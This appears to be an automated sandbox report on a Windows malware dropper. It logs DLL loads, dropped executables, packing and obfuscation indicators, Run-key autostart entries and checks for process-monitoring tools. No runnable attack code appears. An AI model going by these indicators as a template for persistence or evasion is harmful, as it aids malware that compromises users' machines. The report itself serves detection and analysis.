Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2958848 > 1048576
Source: file.exe Static PE information: Raw size of wkslfpnx is bigger than: 0x100000 < 0x2a8e00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 00000007.00000003.2460947098.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 00000007.00000002.2593870400.0000000000932000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Unpacked PE file: 3.2.A94C1J5VAPFWM1J1FS.exe.cc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Unpacked PE file: 4.2.PJGT15Z82T6C2GQS.exe.4a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Unpacked PE file: 7.2.6BWDEAM9H4119O8P9KYSM4M710Q.exe.930000.0.unpack :EW;.rsrc:W;.idata :W;mjjuywzq:EW;kuccapjc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 10.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Unpacked PE file: 13.2.36c3130eac.exe.f10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Unpacked PE file: 14.2.ee8d47a049.exe.710000.0.unpack :EW;.rsrc :W;.idata :W;wkslfpnx:EW;dfiorjat:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wkslfpnx:EW;dfiorjat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Unpacked PE file: 31.2.LIZ1X768O6R3WBN7EPZHLFTDS.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sygcicsm:EW;gyxlqsfm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Unpacked PE file: 33.2.36c3130eac.exe.f10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Unpacked PE file: 34.2.ZR7XTEYLCJ0IZBOL3C6E.exe.1d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Unpacked PE file: 36.2.Z72A5QS1XOE2OWTBBJM669OT.exe.b50000.0.unpack :EW;.rsrc:W;.idata :W;mjjuywzq:EW;kuccapjc:EW;.taggant:EW; vs :ER;.rsrc:W;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: random[1].exe.10.dr Static PE information: real checksum: 0x2d4494 should be: 0x2d5b7e
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: real checksum: 0x2bdd05 should be: 0x2b5596
Source: ee8d47a049.exe.10.dr Static PE information: real checksum: 0x2d4494 should be: 0x2d5b7e
Source: 36c3130eac.exe.10.dr Static PE information: real checksum: 0x1d22e7 should be: 0x1c68ed
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: real checksum: 0x1e00a9 should be: 0x1d79ca
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: real checksum: 0x1d22e7 should be: 0x1c68ed
Source: random[1].exe0.10.dr Static PE information: real checksum: 0x1d22e7 should be: 0x1c68ed
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: real checksum: 0x1e00a9 should be: 0x1d79ca
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: real checksum: 0x1d22e7 should be: 0x1c68ed
Source: file.exe Static PE information: real checksum: 0x2d4494 should be: 0x2d5b7e
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: real checksum: 0x2bdd05 should be: 0x2b5596
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1e00a9 should be: 0x1d79ca
Source: num[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: wkslfpnx
Source: file.exe Static PE information: section name: dfiorjat
Source: file.exe Static PE information: section name: .taggant
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name:
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name: .idata
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name:
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name: sygcicsm
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name: gyxlqsfm
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name: .taggant
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name:
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: .rsrc
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: .idata
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name:
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: wyvqzkuk
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: kejrglww
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: .taggant
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name:
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name: .idata
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name: mjjuywzq
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name: kuccapjc
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: sygcicsm
Source: skotes.exe.3.dr Static PE information: section name: gyxlqsfm
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name: .rsrc
Source: random[1].exe.10.dr Static PE information: section name: .idata
Source: random[1].exe.10.dr Static PE information: section name: wkslfpnx
Source: random[1].exe.10.dr Static PE information: section name: dfiorjat
Source: random[1].exe.10.dr Static PE information: section name: .taggant
Source: ee8d47a049.exe.10.dr Static PE information: section name:
Source: ee8d47a049.exe.10.dr Static PE information: section name: .rsrc
Source: ee8d47a049.exe.10.dr Static PE information: section name: .idata
Source: ee8d47a049.exe.10.dr Static PE information: section name: wkslfpnx
Source: ee8d47a049.exe.10.dr Static PE information: section name: dfiorjat
Source: ee8d47a049.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .rsrc
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: wyvqzkuk
Source: random[1].exe0.10.dr Static PE information: section name: kejrglww
Source: random[1].exe0.10.dr Static PE information: section name: .taggant
Source: 36c3130eac.exe.10.dr Static PE information: section name:
Source: 36c3130eac.exe.10.dr Static PE information: section name: .rsrc
Source: 36c3130eac.exe.10.dr Static PE information: section name: .idata
Source: 36c3130eac.exe.10.dr Static PE information: section name:
Source: 36c3130eac.exe.10.dr Static PE information: section name: wyvqzkuk
Source: 36c3130eac.exe.10.dr Static PE information: section name: kejrglww
Source: 36c3130eac.exe.10.dr Static PE information: section name: .taggant
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name:
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name: .idata
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name:
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name: sygcicsm
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name: gyxlqsfm
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name: .taggant
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name:
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: .rsrc
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: .idata
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name:
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: wyvqzkuk
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: kejrglww
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: .taggant
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name:
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name: .idata
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name: mjjuywzq
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name: kuccapjc
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069FA71 pushfd ; retf 0_3_0069FB62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069FA71 pushfd ; retf 0_3_0069FB62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1AE6 push esp; ret 0_3_006A1AE9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1AE6 push esp; ret 0_3_006A1AE9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A24F8 push esp; retf 0_3_006A24F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A24F8 push esp; retf 0_3_006A24F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069E882 push F80069CBh; retf 0_3_0069E9D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069E882 push F80069CBh; retf 0_3_0069E9D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1286 push eax; ret 0_3_006A1295
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1286 push eax; ret 0_3_006A1295
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069FB65 pushfd ; iretd 0_3_0069FB82
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069FB65 pushfd ; iretd 0_3_0069FB82
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A3564 push ebx; retf 0_3_006A3579
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A3564 push ebx; retf 0_3_006A3579
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A2B5E push esp; ret 0_3_006A2B61
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A2B5E push esp; ret 0_3_006A2B61
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A350A push ebx; retf 0_3_006A3579
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A350A push ebx; retf 0_3_006A3579
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069E9D2 push F80069CBh; retf 0_3_0069E9D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069E9D2 push F80069CBh; retf 0_3_0069E9D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069FA71 pushfd ; retf 0_3_0069FB62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069FA71 pushfd ; retf 0_3_0069FB62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1AE6 push esp; ret 0_3_006A1AE9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1AE6 push esp; ret 0_3_006A1AE9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A24F8 push esp; retf 0_3_006A24F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A24F8 push esp; retf 0_3_006A24F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069E882 push F80069CBh; retf 0_3_0069E9D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069E882 push F80069CBh; retf 0_3_0069E9D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1286 push eax; ret 0_3_006A1295
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_006A1286 push eax; ret 0_3_006A1295
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0069FB65 pushfd ; iretd 0_3_0069FB82
Source: file.exe Static PE information: section name: entropy: 7.984667685807601
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name: entropy: 7.984117370985836
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name: sygcicsm entropy: 7.953726333004154
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: wyvqzkuk entropy: 7.95409499130381
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name: entropy: 7.760211110417353
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.984117370985836
Source: skotes.exe.3.dr Static PE information: section name: sygcicsm entropy: 7.953726333004154
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.984667685807601
Source: ee8d47a049.exe.10.dr Static PE information: section name: entropy: 7.984667685807601
Source: random[1].exe0.10.dr Static PE information: section name: wyvqzkuk entropy: 7.95409499130381
Source: 36c3130eac.exe.10.dr Static PE information: section name: wyvqzkuk entropy: 7.95409499130381
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name: entropy: 7.984117370985836
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name: sygcicsm entropy: 7.953726333004154
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: wyvqzkuk entropy: 7.95409499130381
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name: entropy: 7.760211110417353
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File created: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File created: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File created: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee8d47a049.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 36c3130eac.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 55662d7496.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
